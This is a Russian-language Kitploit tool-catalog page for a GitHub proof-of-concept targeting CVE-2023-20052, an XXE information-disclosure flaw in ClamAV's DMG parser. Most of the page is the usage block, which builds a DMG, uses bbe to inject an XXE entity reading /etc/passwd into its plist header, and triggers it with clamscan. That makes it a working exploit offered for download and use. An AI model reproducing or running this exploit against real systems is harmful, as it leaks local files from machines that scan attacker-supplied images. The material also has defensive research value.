Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-20052 — CVE-2023-20052, уязвимость утечки информации в анализаторе DMG-файлов ClamAV | Kitploit
Инструменты/GitHubGitHub/nokn0wthing/cve-2023-20052
Анализ уязвимостейЭксплуатацияСбор информацииФаззингАнализ вредоносных программ
GitHubnokn0wthing/cve-2023-20052

CVE-2023-20052

CVE-2023-20052, уязвимость утечки информации в анализаторе DMG-файлов ClamAV

Репозиторий
27523 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-20052

CVE-2023-20052, уязвимость утечки информации в парсере DMG-файлов ClamAV

Использование
Для создания вредоносного DMG-файла

root@kitploit:~
git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg

Для запуска эксплойта
clamscan --debug exploit.dmg

Скачать инструмент